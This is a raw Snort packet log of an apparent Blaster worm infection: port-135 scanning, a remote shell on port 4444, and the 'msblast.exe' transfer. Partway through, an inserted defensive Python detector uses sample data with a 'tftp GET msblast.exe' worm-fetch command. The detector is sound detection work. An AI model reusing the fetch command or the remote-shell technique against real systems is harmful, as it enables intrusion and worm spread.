08/15-11:17:41.862761 137.189.99.200:1040 -> 168.235.185.10:135
TCP TTL:128 TOS:0x0 ID:140 IpLen:20 DgmLen:48 DF
******S* Seq: 0xB5228C9 Ack: 0x0 Win: 0xFAF0 TcpLen: 28
TCP Options (4) => MSS: 1460 NOP NOP SackOK
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
08/15-11:17:41.863186 137.189.99.200:1041 -> 168.235.185.11:135
TCP TTL:128 TOS:0x0 ID:141 IpLen:20 DgmLen:48 DF
******S* Seq: 0xB531A35 Ack: 0x0 Win: 0xFAF0 TcpLen: 28
TCP Options (4) => MSS: 1460 NOP NOP SackOK
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
08/15-11:17:41.863551 137.189.99.200:1042 -> 168.235.185.12:135
TCP TTL:128 TOS:0x0 ID:142 IpLen:20 DgmLen:48 DF
******S* Seq: 0xB53FC0B Ack: 0x0 Win: 0xFAF0 TcpLen: 28
TCP Options (4) => MSS: 1460 NOP NOP SackOK
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
08/15-11:17:41.863919 137.189.99.200:1043 -> 168.235.185.13:135
TCP TTL:128 TOS:0x0 ID:143 IpLen:20 DgmLen:48 DF
******S* Seq: 0xB54D813 Ack: 0x0 Win: 0xFAF0 TcpLen: 28
TCP Options (4) => MSS: 1460 NOP NOP SackOK
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
08/15-11:17:41.864291 137.189.99.200:1044 -> 168.235.185.14:135
TCP TTL:128 TOS:0x0 ID:144 IpLen:20 DgmLen:48 DF
******S* Seq: 0xB555A9F Ack: 0x0 Win: 0xFAF0 TcpLen: 28
TCP Options (4) => MSS: 1460 NOP NOP SackOK
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
08/15-11:17:41.864650 137.189.99.200:1045 -> 168.235.185.15:135
TCP TTL:128 TOS:0x0 ID:145 IpLen:20 DgmLen:48 DF
******S* Seq: 0xB56204B Ack: 0x0 Win: 0xFAF0 TcpLen: 28
TCP Options (4) => MSS: 1460 NOP NOP SackOK
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
08/15-11:17:41.865016 137.189.99.200:1046 -> 168.235.185.16:135
TCP TTL:128 TOS:0x0 ID:146 IpLen:20 DgmLen:48 DF
******S* Seq: 0xB56D655 Ack: 0x0 Win: 0xFAF0 TcpLen: 28
TCP Options (4) => MSS: 1460 NOP NOP SackOK
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
08/15-11:17:41.865427 137.189.99.200:1047 -> 168.235.185.17:135
TCP TTL:128 TOS:0x0 ID:147 IpLen:20 DgmLen:48 DF
******S* Seq: 0xB5787FE Ack: 0x0 Win: 0xFAF0 TcpLen: 28
TCP Options (4) => MSS: 1460 NOP NOP SackOK
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
08/15-11:17:41.865805 137.189.99.200:1048 -> 168.235.185.18:135
TCP TTL:128 TOS:0x0 ID:148 IpLen:20 DgmLen:48 DF
******S* Seq: 0xB582BA5 Ack: 0x0 Win: 0xFAF0 TcpLen: 28
TCP Options (4) => MSS: 1460 NOP NOP SackOK
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
08/15-11:17:41.866181 137.189.99.200:1049 -> 168.235.185.19:135
TCP TTL:128 TOS:0x0 ID:149 IpLen:20 DgmLen:48 DF
******S* Seq: 0xB591945 Ack: 0x0 Win: 0xFAF0 TcpLen: 28
TCP Options (4) => MSS: 1460 NOP NOP SackOK
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
08/15-11:17:41.867510 137.189.99.200:1050 -> 168.235.185.20:135
TCP TTL:128 TOS:0x0 ID:150 IpLen:20 DgmLen:48 DF
******S* Seq: 0xB59A94F Ack: 0x0 Win: 0xFAF0 TcpLen: 28
TCP Options (4) => MSS: 1460 NOP NOP SackOK
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
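The four stages annotated in this trace (data pushed to TCP 135, a shell accepted on TCP 4444, a TFTP request back to the source, then a sweep of port 135) can be matched as a chain over Snort records in this format. The Python below is an added example, not part of the original capture; the function names, thresholds and the sample log (RFC 5737 documentation addresses) are constructed for illustration.

```python
import re
from collections import defaultdict

# Header line of a Snort full-format record: "MM/DD-HH:MM:SS.usec src:port -> dst:port"
HDR = re.compile(r"^\d\d/\d\d-(\d\d):(\d\d):(\d\d\.\d+) ([\d.]+):(\d+) -> ([\d.]+):(\d+)\s*$")
FLAGS = re.compile(r"^([*12UAPRSF]{8}) Seq:")   # e.g. "***AP*** Seq: 0x..."
SYN, SYNACK = "******S*", "***A**S*"


def parse_snort(text):
    """Return one dict per packet; separator, annotation and payload lines are skipped.
    Only the time of day is parsed, so the log is assumed to cover a single day."""
    packets, cur = [], None
    for line in text.splitlines():
        m = HDR.match(line)
        if m:
            h, mi, s, src, sport, dst, dport = m.groups()
            cur = {"ts": int(h) * 3600 + int(mi) * 60 + float(s), "src": src,
                   "sport": int(sport), "dst": dst, "dport": int(dport),
                   "proto": None, "flags": ""}
            packets.append(cur)
        elif cur and cur["proto"] is None and line[:4] in ("TCP ", "UDP "):
            cur["proto"] = line[:3]
        elif cur and not cur["flags"] and FLAGS.match(line):
            cur["flags"] = FLAGS.match(line).group(1)
    return packets


def find_infections(packets, scan_hosts=10, scan_window=5.0):
    """Track each (source, victim) pair through the four stages seen in the trace.

    1 = data pushed to victim TCP 135 (on its own this is ordinary RPC traffic)
    2 = victim then accepts the same source on TCP 4444 (SYN/ACK from port 4444)
    3 = victim then sends UDP to port 69 on that source (TFTP request)
    4 = victim then SYNs port 135 on >= scan_hosts distinct hosts within scan_window s
    """
    stage, pulled, syns = {}, {}, defaultdict(list)
    for p in sorted(packets, key=lambda p: p["ts"]):   # records can be slightly out of order
        tcp = p["proto"] == "TCP"
        fwd, rev = (p["src"], p["dst"]), (p["dst"], p["src"])
        if tcp and p["dport"] == 135 and "P" in p["flags"]:
            stage.setdefault(fwd, 1)
        elif tcp and p["sport"] == 4444 and p["flags"] == SYNACK and stage.get(rev) == 1:
            stage[rev] = 2
        elif p["proto"] == "UDP" and p["dport"] == 69 and stage.get(rev) == 2:
            stage[rev] = 3
            pulled[p["src"]] = rev
        elif tcp and p["dport"] == 135 and p["flags"] == SYN and p["src"] in pulled:
            seen = syns[p["src"]]
            seen.append((p["ts"], p["dst"]))
            seen[:] = [(t, d) for t, d in seen if p["ts"] - t <= scan_window]
            if len({d for _, d in seen}) >= scan_hosts:
                stage[pulled[p["src"]]] = 4
    return [{"source": a, "victim": v, "stage": s} for (a, v), s in stage.items()]


def build_sample():
    """Constructed log in the page's record format (RFC 5737 documentation addresses)."""
    a, v, sep = "203.0.113.25", "192.0.2.200", "=+" * 37

    def tcp(ts, src, dst, flags, payload=""):
        rec = (f"08/15-11:17:{ts} {src} -> {dst}\n"
               "TCP TTL:128 TOS:0x0 ID:1 IpLen:20 DgmLen:48 DF\n"
               f"{flags} Seq: 0x1 Ack: 0x0 Win: 0xFAF0 TcpLen: 20")
        return rec + ("\n" + payload if payload else "")

    recs = [
        tcp("20.000000", "192.0.2.10:2000", "192.0.2.20:135", "***AP***"),  # ordinary RPC call
        tcp("26.509720", f"{a}:1043", f"{v}:135", "***AP***"),
        tcp("26.964427", f"{a}:1060", f"{v}:4444", SYN),
        tcp("26.964711", f"{v}:4444", f"{a}:1060", "***A*R**"),   # port not listening yet
        tcp("27.915007", f"{a}:1060", f"{v}:4444", SYN),
        tcp("27.915325", f"{v}:4444", f"{a}:1060", SYNACK),
        "Download the worm via TFTP from the source\n"
        + tcp("28.509338", f"{a}:1060", f"{v}:4444", "***AP***",
              f"tftp -i {a} GET msblast.exe."),
        f"08/15-11:17:28.762953 {v}:1030 -> {a}:69\n"
        "UDP TTL:128 TOS:0x0 ID:2 IpLen:20 DgmLen:48\nLen: 28",
    ]
    recs += [tcp(f"{41.86 + i * 0.001:09.6f}", f"{v}:{1031 + i}",
                 f"198.51.100.{i + 1}:135", SYN) for i in range(12)]
    return ("\n" + sep + "\n").join(recs) + "\n"


if __name__ == "__main__":
    for hit in find_infections(parse_snort(build_sample())):
        print(hit)
```

A pair that stops at stage 1 is normal RPC use; the chain from stage 2 onward is what separates an infected host from a busy one.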
08/15-11:17:42.195271 205.186.81.25:1060 -> 137.189.99.200:4444
TCP TTL:111 TOS:0x0 ID:57047 IpLen:20 DgmLen:40 DF
***A**** Seq: 0xCA1A3C93 Ack: 0xB15C930 Win: 0x15DD TcpLen: 20
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
08/15-11:17:42.195489 137.189.99.200:4444 -> 205.186.81.25:1060
TCP TTL:128 TOS:0x0 ID:151 IpLen:20 DgmLen:62 DF
***AP*** Seq: 0xB15C930 Ack: 0xCA1A3C93 Win: 0xFAB8 TcpLen: 20
..C:\WINDOWS\system32>
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
08/15-11:17:42.808325 205.186.81.25:1060 -> 137.189.99.200:4444
TCP TTL:111 TOS:0x0 ID:57048 IpLen:20 DgmLen:40 DF
***A**** Seq: 0xCA1A3C93 Ack: 0xB15C946 Win: 0x15C7 TcpLen: 20
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
08/15-11:17:43.548664 205.186.81.25:1060 -> 137.189.99.200:4444
TCP TTL:111 TOS:0x0 ID:57049 IpLen:20 DgmLen:52 DF
***AP*** Seq: 0xCA1A3C93 Ack: 0xB15C946 Win: 0x15C7 TcpLen: 20
msblast.exe.
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
08/15-11:17:43.549121 137.189.99.200:4444 -> 205.186.81.25:1060
TCP TTL:128 TOS:0x0 ID:152 IpLen:20 DgmLen:52 DF
***AP*** Seq: 0xB15C946 Ack: 0xCA1A3C9F Win: 0xFAAC TcpLen: 20
msblast.exe.
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
08/15-11:17:43.669789 137.189.99.200:1051 -> 168.235.185.21:135
TCP TTL:128 TOS:0x0 ID:153 IpLen:20 DgmLen:48 DF
******S* Seq: 0xB61673E Ack: 0x0 Win: 0xFAF0 TcpLen: 28
TCP Options (4) => MSS: 1460 NOP NOP SackOK
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
08/15-11:17:43.670169 137.189.99.200:1052 -> 168.235.185.22:135
TCP TTL:128 TOS:0x0 ID:154 IpLen:20 DgmLen:48 DF
******S* Seq: 0xB622357 Ack: 0x0 Win: 0xFAF0 TcpLen: 28
TCP Options (4) => MSS: 1460 NOP NOP SackOK
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
08/15-11:17:43.670504 137.189.99.200:1053 -> 168.235.185.23:135
TCP TTL:128 TOS:0x0 ID:155 IpLen:20 DgmLen:48 DF
******S* Seq: 0xB62AC08 Ack: 0x0 Win: 0xFAF0 TcpLen: 28
TCP Options (4) => MSS: 1460 NOP NOP SackOK
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
08/15-11:17:43.670843 137.189.99.200:1054 -> 168.235.185.24:135
TCP TTL:128 TOS:0x0 ID:156 IpLen:20 DgmLen:48 DF
******S* Seq: 0xB632D9F Ack: 0x0 Win: 0xFAF0 TcpLen: 28
TCP Options (4) => MSS: 1460 NOP NOP SackOK
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
08/15-11:17:43.671172 137.189.99.200:1055 -> 168.235.185.25:135
TCP TTL:128 TOS:0x0 ID:157 IpLen:20 DgmLen:48 DF
******S* Seq: 0xB63F7DB Ack: 0x0 Win: 0xFAF0 TcpLen: 28
TCP Options (4) => MSS: 1460 NOP NOP SackOK
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
08/15-11:17:43.671516 137.189.99.200:1056 -> 168.235.185.26:135
TCP TTL:128 TOS:0x0 ID:158 IpLen:20 DgmLen:48 DF
******S* Seq: 0xB64D966 Ack: 0x0 Win: 0xFAF0 TcpLen: 28
TCP Options (4) => MSS: 1460 NOP NOP SackOK
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
08/15-11:17:43.671860 137.189.99.200:1057 -> 168.235.185.27:135
TCP TTL:128 TOS:0x0 ID:159 IpLen:20 DgmLen:48 DF
******S* Seq: 0xB6583DE Ack: 0x0 Win: 0xFAF0 TcpLen: 28
TCP Options (4) => MSS: 1460 NOP NOP SackOK
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
08/15-11:17:43.672201 137.189.99.200:1058 -> 168.235.185.28:135
TCP TTL:128 TOS:0x0 ID:160 IpLen:20 DgmLen:48 DF
******S* Seq: 0xB6683B4 Ack: 0x0 Win: 0xFAF0 TcpLen: 28
TCP Options (4) => MSS: 1460 NOP NOP SackOK
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
08/15-11:17:43.672547 137.189.99.200:1059 -> 168.235.185.29:135
TCP TTL:128 TOS:0x0 ID:161 IpLen:20 DgmLen:48 DF
******S* Seq: 0xB674CC2 Ack: 0x0 Win: 0xFAF0 TcpLen: 28
TCP Options (4) => MSS: 1460 NOP NOP SackOK
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
08/15-11:17:43.672895 137.189.99.200:1060 -> 168.235.185.30:135
TCP TTL:128 TOS:0x0 ID:162 IpLen:20 DgmLen:48 DF
******S* Seq: 0xB682232 Ack: 0x0 Win: 0xFAF0 TcpLen: 28
TCP Options (4) => MSS: 1460 NOP NOP SackOK
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
08/15-11:17:43.673249 137.189.99.200:1061 -> 168.235.185.31:135
TCP TTL:128 TOS:0x0 ID:163 IpLen:20 DgmLen:48 DF
******S* Seq: 0xB690691 Ack: 0x0 Win: 0xFAF0 TcpLen: 28
TCP Options (4) => MSS: 1460 NOP NOP SackOK
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
08/15-11:17:43.674955 137.189.99.200:1062 -> 168.235.185.32:135
TCP TTL:128 TOS:0x0 ID:164 IpLen:20 DgmLen:48 DF
******S* Seq: 0xB69EF12 Ack: 0x0 Win: 0xFAF0 TcpLen: 28
TCP Options (4) => MSS: 1460 NOP NOP SackOK
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
08/15-11:17:43.674959 137.189.99.200:1063 -> 168.235.185.33:135
TCP TTL:128 TOS:0x0 ID:165 IpLen:20 DgmLen:48 DF
******S* Seq: 0xB6A9E10 Ack: 0x0 Win: 0xFAF0 TcpLen: 28
TCP Options (4) => MSS: 1460 NOP NOP SackOK
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
08/15-11:17:43.674975 137.189.99.200:1064 -> 168.235.185.34:135
TCP TTL:128 TOS:0x0 ID:166 IpLen:20 DgmLen:48 DF
******S* Seq: 0xB6B8EDC Ack: 0x0 Win: 0xFAF0 TcpLen: 28
TCP Options (4) => MSS: 1460 NOP NOP SackOK
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
08/15-11:17:43.674981 137.189.99.200:1065 -> 168.235.185.35:135
TCP TTL:128 TOS:0x0 ID:167 IpLen:20 DgmLen:48 DF
******S* Seq: 0xB6C0EF8 Ack: 0x0 Win: 0xFAF0 TcpLen: 28
TCP Options (4) => MSS: 1460 NOP NOP SackOK
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
08/15-11:17:43.675472 137.189.99.200:1067 -> 168.235.185.37:135
TCP TTL:128 TOS:0x0 ID:169 IpLen:20 DgmLen:48 DF
******S* Seq: 0xB6D31A2 Ack: 0x0 Win: 0xFAF0 TcpLen: 28
TCP Options (4) => MSS: 1460 NOP NOP SackOK
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
08/15-11:17:43.675855 137.189.99.200:1068 -> 168.235.185.38:135
TCP TTL:128 TOS:0x0 ID:170 IpLen:20 DgmLen:48 DF
******S* Seq: 0xB6DB5DE Ack: 0x0 Win: 0xFAF0 TcpLen: 28
TCP Options (4) => MSS: 1460 NOP NOP SackOK
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
08/15-11:17:43.675193 137.189.99.200:1066 -> 168.235.185.36:135
TCP TTL:128 TOS:0x0 ID:168 IpLen:20 DgmLen:48 DF
******S* Seq: 0xB6CA6A5 Ack: 0x0 Win: 0xFAF0 TcpLen: 28
TCP Options (4) => MSS: 1460 NOP NOP SackOK
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
08/15-11:17:43.677565 137.189.99.200:1069 -> 168.235.185.39:135
TCP TTL:128 TOS:0x0 ID:171 IpLen:20 DgmLen:48 DF
******S* Seq: 0xB6E624C Ack: 0x0 Win: 0xFAF0 TcpLen: 28
TCP Options (4) => MSS: 1460 NOP NOP SackOK
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
08/15-11:17:43.677578 137.189.99.200:1070 -> 168.235.185.40:135
TCP TTL:128 TOS:0x0 ID:172 IpLen:20 DgmLen:48 DF
******S* Seq: 0xB6F6213 Ack: 0x0 Win: 0xFAF0 TcpLen: 28
TCP Options (4) => MSS: 1460 NOP NOP SackOK
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
08/15-11:17:44.212281 205.186.81.25:1060 -> 137.189.99.200:4444
TCP TTL:111 TOS:0x0 ID:57050 IpLen:20 DgmLen:40 DF
***A**** Seq: 0xCA1A3C9F Ack: 0xB15C952 Win: 0x15BB TcpLen: 20
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
08/15-11:17:44.212541 137.189.99.200:4444 -> 205.186.81.25:1060
TCP TTL:128 TOS:0x0 ID:173 IpLen:20 DgmLen:62 DF
***AP*** Seq: 0xB15C952 Ack: 0xCA1A3C9F Win: 0xFAAC TcpLen: 20
..C:\WINDOWS\system32>
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
08/15-11:17:44.814510 205.186.81.25:1060 -> 137.189.99.200:4444
TCP TTL:111 TOS:0x0 ID:57051 IpLen:20 DgmLen:40 DF
***A**** Seq: 0xCA1A3C9F Ack: 0xB15C968 Win: 0x15A5 TcpLen: 20
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
08/15-11:17:45.482078 137.189.99.200:1071 -> 168.235.185.41:135
TCP TTL:128 TOS:0x0 ID:174 IpLen:20 DgmLen:48 DF
******S* Seq: 0xB76F9E2 Ack: 0x0 Win: 0xFAF0 TcpLen: 28
TCP Options (4) => MSS: 1460 NOP NOP SackOK
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
08/15-11:17:45.482457 137.189.99.200:1072 -> 168.235.185.42:135
TCP TTL:128 TOS:0x0 ID:175 IpLen:20 DgmLen:48 DF
******S* Seq: 0xB77AF65 Ack: 0x0 Win: 0xFAF0 TcpLen: 28
TCP Options (4) => MSS: 1460 NOP NOP SackOK
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
08/15-11:17:45.482787 137.189.99.200:1073 -> 168.235.185.43:135
TCP TTL:128 TOS:0x0 ID:176 IpLen:20 DgmLen:48 DF
******S* Seq: 0xB78508B Ack: 0x0 Win: 0xFAF0 TcpLen: 28
TCP Options (4) => MSS: 1460 NOP NOP SackOK
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
08/15-11:17:45.485003 137.189.99.200:1074 -> 168.235.185.44:135
TCP TTL:128 TOS:0x0 ID:177 IpLen:20 DgmLen:48 DF
******S* Seq: 0xB794058 Ack: 0x0 Win: 0xFAF0 TcpLen: 28
TCP Options (4) => MSS: 1460 NOP NOP SackOK
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
08/15-11:17:45.485009 137.189.99.200:1075 -> 168.235.185.45:135
TCP TTL:128 TOS:0x0 ID:178 IpLen:20 DgmLen:48 DF
******S* Seq: 0xB7A3DCF Ack: 0x0 Win: 0xFAF0 TcpLen: 28
TCP Options (4) => MSS: 1460 NOP NOP SackOK
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
08/15-11:17:45.485013 137.189.99.200:1076 -> 168.235.185.46:135
TCP TTL:128 TOS:0x0 ID:179 IpLen:20 DgmLen:48 DF
******S* Seq: 0xB7B01A9 Ack: 0x0 Win: 0xFAF0 TcpLen: 28
TCP Options (4) => MSS: 1460 NOP NOP SackOK
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
08/15-11:17:45.485021 137.189.99.200:1077 -> 168.235.185.47:135
TCP TTL:128 TOS:0x0 ID:180 IpLen:20 DgmLen:48 DF
******S* Seq: 0xB7B92A7 Ack: 0x0 Win: 0xFAF0 TcpLen: 28
TCP Options (4) => MSS: 1460 NOP NOP SackOK
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
08/15-11:17:45.485026 137.189.99.200:1078 -> 168.235.185.48:135
TCP TTL:128 TOS:0x0 ID:181 IpLen:20 DgmLen:48 DF
******S* Seq: 0xB7C6700 Ack: 0x0 Win: 0xFAF0 TcpLen: 28
TCP Options (4) => MSS: 1460 NOP NOP SackOK
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
08/15-11:17:45.485032 137.189.99.200:1079 -> 168.235.185.49:135
TCP TTL:128 TOS:0x0 ID:182 IpLen:20 DgmLen:48 DF
******S* Seq: 0xB7CF19E Ack: 0x0 Win: 0xFAF0 TcpLen: 28
TCP Options (4) => MSS: 1460 NOP NOP SackOK
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
08/15-11:17:45.485038 137.189.99.200:1080 -> 168.235.185.50:135
TCP TTL:128 TOS:0x0 ID:183 IpLen:20 DgmLen:48 DF
******S* Seq: 0xB7DE86B Ack: 0x0 Win: 0xFAF0 TcpLen: 28
TCP Options (4) => MSS: 1460 NOP NOP SackOK
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
08/15-11:17:45.485388 137.189.99.200:1081 -> 168.235.185.51:135
TCP TTL:128 TOS:0x0 ID:184 IpLen:20 DgmLen:48 DF
******S* Seq: 0xB7E906C Ack: 0x0 Win: 0xFAF0 TcpLen: 28
TCP Options (4) => MSS: 1460 NOP NOP SackOK
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
08/15-11:17:45.485762 137.189.99.200:1082 -> 168.235.185.52:135
TCP TTL:128 TOS:0x0 ID:185 IpLen:20 DgmLen:48 DF
******S* Seq: 0xB7F7FCE Ack: 0x0 Win: 0xFAF0 TcpLen: 28
TCP Options (4) => MSS: 1460 NOP NOP SackOK
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
08/15-11:17:45.487634 137.189.99.200:1083 -> 168.235.185.53:135
TCP TTL:128 TOS:0x0 ID:186 IpLen:20 DgmLen:48 DF
******S* Seq: 0xB805EF8 Ack: 0x0 Win: 0xFAF0 TcpLen: 28
TCP Options (4) => MSS: 1460 NOP NOP SackOK
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
08/15-11:17:45.487644 137.189.99.200:1084 -> 168.235.185.54:135
TCP TTL:128 TOS:0x0 ID:187 IpLen:20 DgmLen:48 DF
******S* Seq: 0xB8142D9 Ack: 0x0 Win: 0xFAF0 TcpLen: 28
TCP Options (4) => MSS: 1460 NOP NOP SackOK
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
08/15-11:17:45.487649 137.189.99.200:1085 -> 168.235.185.55:135
TCP TTL:128 TOS:0x0 ID:188 IpLen:20 DgmLen:48 DF
******S* Seq: 0xB82020C Ack: 0x0 Win: 0xFAF0 TcpLen: 28
TCP Options (4) => MSS: 1460 NOP NOP SackOK
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
08/15-11:17:45.487654 137.189.99.200:1086 -> 168.235.185.56:135
TCP TTL:128 TOS:0x0 ID:189 IpLen:20 DgmLen:48 DF
******S* Seq: 0xB82CE5C Ack: 0x0 Win: 0xFAF0 TcpLen: 28
TCP Options (4) => MSS: 1460 NOP NOP SackOK
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
08/15-11:17:45.487658 137.189.99.200:1087 -> 168.235.185.57:135
TCP TTL:128 TOS:0x0 ID:190 IpLen:20 DgmLen:48 DF
******S* Seq: 0xB83AE89 Ack: 0x0 Win: 0xFAF0 TcpLen: 28
TCP Options (4) => MSS: 1460 NOP NOP SackOK
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
08/15-11:17:45.488298 137.189.99.200:1089 -> 168.235.185.59:135
TCP TTL:128 TOS:0x0 ID:192 IpLen:20 DgmLen:48 DF
******S* Seq: 0xB851069 Ack: 0x0 Win: 0xFAF0 TcpLen: 28
TCP Options (4) => MSS: 1460 NOP NOP SackOK
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
08/15-11:17:45.487880 137.189.99.200:1088 -> 168.235.185.58:135
TCP TTL:128 TOS:0x0 ID:191 IpLen:20 DgmLen:48 DF
******S* Seq: 0xB844CC0 Ack: 0x0 Win: 0xFAF0 TcpLen: 28
